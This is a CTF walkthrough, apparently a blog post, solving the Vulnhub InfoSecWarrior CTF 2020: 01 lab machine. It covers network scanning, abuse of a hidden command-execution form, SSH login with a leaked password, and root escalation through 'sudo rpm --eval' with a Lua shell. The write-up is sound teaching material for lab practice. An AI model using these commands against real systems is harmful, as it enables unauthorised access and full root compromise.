577, Gold Plaza, Punjab Jewellers, M.G. Road, Opp. Treasure Island Mall

InfoSecWarrior CTF: 1 Walkthrough

Here’s a new InfoSecWarrior CTF: 1 Walkthrough for Vulnhub machines. InfoSecWarrior CTF 2020: 01 is the first challenge of Infosec Warrior CTF 2020. This challenge was created by CyberKnight00 and MAALP1225. You can download here this CTF. It states the level is an Easy level and that is true so what. Either way, you explore a little if this is unfamiliar and that’s how you learn. This is the box designed for the beginners and wannabe hackers to cherish their pentesting skills. So, here we go.

InfoSecWarrior CTF 2020: 01 Walkthrough

Penetration Testing Methodologies

Network Scan

  •  Netdicover
  •  Nmap Enumeration

Enumeration

  •  Nikto
  • Password guessing
  • web enumeration

Privilege Escalation

  • Capture the Flag.
  • password
  • Sudo -l

Network Scanning

Without wasting much time a star with the obtaining IP address of the box. I use netdiscover and got the IP 192.168.2.13.

#netdiscover -i vboxnet0                                                                                                                                                                                                                                                                                                                  
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.2     08:00:27:b8:05:a6      1      42  PCS Systemtechnik GmbH                                                                                                                       
 192.168.2.13    08:00:27:7a:cd:67      1      60  PCS Systemtechnik GmbH

Let’s proceed with the network scan using Nmap aggressive scan as shown below.

#nmap -p- -A -sS -sC 192.168.2.13

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 12:11 IST
Nmap scan report for 192.168.2.13
Host is up (0.00074s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2f:b3:a5:cd:e5:14:33:a1:82:3b:dd:5a:5e:d7:59:36 (DSA)
|_  2048 2d:b4:15:28:36:d8:b5:4e:18:81:8e:af:3e:e4:de:c1 (RSA)
80/tcp open  http    Apache httpd 2.2.15 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
MAC Address: 08:00:27:7A:CD:67 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop
Nmap did: 1 IP address (1 host up) scanned in 164.64 seconds

Enumeration

The first thing we notice is port 80 is open and we see the Apache Test page on the web.

InfoSecWarrior CTF 2020: 01 Walkthrough

On further enumeration, I came across a /note.txt as shown below. and nothing important to see here.

InfoSecWarrior CTF 2020: 01 Walkthrough

There is the indexing of /sitemap.xml. Which lead to a new page /index.htnl

sitemap

The page consists of a gif. So I viewed the page source of the page.

meme

<h1>Keep Calm And HACK</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="1280"> 
<img hidden="True" src="minnions.gif" alt="Hackor" height="640" width="1280">   [here ther is an gif that is hidden ]
<form action = "/cmd.php" hidden="True" method = "GET">  [ here there is a form that is hidden ]
 command
     <input type = "text" name = "AI" value = "" maxlength = "100" />
 <br />
 <input type = "submit" value ="Submit" />
</form>

So I change the hidden part of the code and an “id ” command by /cmd.php 

inspect

It worked but not as I respected to be. it gave an error and a clue to use another methodology of HTTP. So I changed the method GET to POST for the form.

id

Yess I found you.  Now I tried to opening /etc/passwd/ 

InfoSecWarrior CTF 2020: 01 Walkthrough

On more enumeration, I open /cmd.php and found the password of the user isw0:123456789blabla

 #ssh [email protected]

The authenticity of host '192.168.2.13 (192.168.2.13)' can't be established.
RSA key fingerprint is SHA256:rNHlcfJ22Jb4j6wQvLvKK/+tc9khM8tM3yq9yDiz6dQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.13' (RSA) to the list of known hosts.
[email protected]'s password: 
Last login: Thu Feb 13 18:41:34 2020 from 192.168.1.56
[[email protected] ~]$ whoami
isw0
[[email protected] html]$ id
uid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[[email protected] html]$ hostname
InfosecWarrior
[[email protected] ~]$ cat isw0_user 
e4408105ca9c2a5c2714a818c475d06e
[[email protected] ~]$ 

Got the user flag going for the root flag.

[[email protected] ~]$ sudo -l
Matching Defaults entries for isw0 on this host:
    !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User isw0 may run the following commands on this host:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ping, (root) /bin/ping6, (root) /bin/rpm, (root) /bin/ls, (root) /bin/mktemp
[[email protected] ~]$ sudo bash
[sudo] password for isw0: 
Sorry, user isw0 is not allowed to execute '/bin/bash' as root on InfosecWarrior.
[[email protected] ~]$ sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
[sudo] password for isw0: 
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:rpm_script_t:s0-s0:c0.c1023
sh-4.1# hostname
InfosecWarrior
sh-4.1# cd
sh-4.1# ls
anaconda-ks.cfg  Armour.sh  flag.txt  install.log  install.log.syslog
sh-4.1# cat flag.txt 
fc9c6eb6265921315e7c70aebd22af7e
sh-4.1# exit
exit

 

Eureka !!!!!! GOT THE FLAG

 

Leave a comment

WhatsApp us